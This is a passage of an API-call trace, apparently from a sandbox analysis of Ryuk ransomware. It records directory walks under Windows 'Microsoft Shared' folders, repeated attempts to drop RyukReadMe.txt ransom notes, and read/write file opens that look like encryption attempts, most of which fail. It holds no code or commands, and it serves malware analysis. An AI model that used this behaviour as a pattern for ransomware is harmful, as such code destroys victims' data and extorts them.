hTemplateFile=0x0) returned 0xffffffffffffffff [0133.307] GetLastError () returned 0x5 [0133.307] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.308] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.308] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.308] SetLastError (dwErrCode=0x0) [0133.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.308] GetLastError () returned 0x5 [0133.308] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.308] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.308] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.308] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.308] SetLastError (dwErrCode=0x0) [0133.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.309] GetLastError () returned 0x5 [0133.309] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.309] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0133.310] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.310] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.310] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM", dwFileAttributes=0x80) returned 0 [0133.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.310] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.310] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.311] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM", dwFileAttributes=0x80) returned 0 [0133.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.311] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.311] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM", dwFileAttributes=0x80) returned 0 [0133.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.312] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.312] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM", dwFileAttributes=0x80) returned 0 [0133.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.313] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.313] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM", dwFileAttributes=0x80) returned 0 [0133.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.313] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.313] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM", dwFileAttributes=0x80) returned 0 [0133.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.314] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.314] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0133.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM", dwFileAttributes=0x80) returned 0 [0133.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.315] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0133.315] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0133.316] SetLastError (dwErrCode=0x0) [0133.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.318] GetLastError () returned 0x5 [0133.318] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0133.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.319] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.319] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.319] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.319] SetLastError (dwErrCode=0x0) [0133.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.319] GetLastError () returned 0x5 [0133.319] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.319] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.319] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.319] SetLastError (dwErrCode=0x0) [0133.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.319] GetLastError () returned 0x5 [0133.319] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.319] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.319] SetLastError (dwErrCode=0x0) [0133.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.319] GetLastError () returned 0x5 [0133.319] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.319] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.320] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.320] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.320] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.320] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.320] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.320] SetLastError (dwErrCode=0x0) [0133.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.321] GetLastError () returned 0x5 [0133.321] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.321] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.321] SetLastError (dwErrCode=0x0) [0133.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.321] GetLastError () returned 0x5 [0133.321] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.321] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.321] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.321] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.321] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.321] SetLastError (dwErrCode=0x0) [0133.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.321] GetLastError () returned 0x5 [0133.321] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.321] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.322] SetLastError (dwErrCode=0x0) [0133.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.322] GetLastError () returned 0x5 [0133.322] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.322] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.322] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.322] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.322] SetLastError (dwErrCode=0x0) [0133.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.322] GetLastError () returned 0x5 [0133.322] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.322] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.324] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.324] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX", dwFileAttributes=0x80) returned 0 [0133.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.324] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.324] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX", dwFileAttributes=0x80) returned 0 [0133.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.325] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX", dwFileAttributes=0x80) returned 0 [0133.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.325] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX", dwFileAttributes=0x80) returned 0 [0133.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.326] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX", dwFileAttributes=0x80) returned 0 [0133.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.327] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP", dwFileAttributes=0x80) returned 0 [0133.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.327] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.327] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX", dwFileAttributes=0x80) returned 0 [0133.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.328] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.328] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.328] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.328] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX", dwFileAttributes=0x80) returned 0 [0133.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio 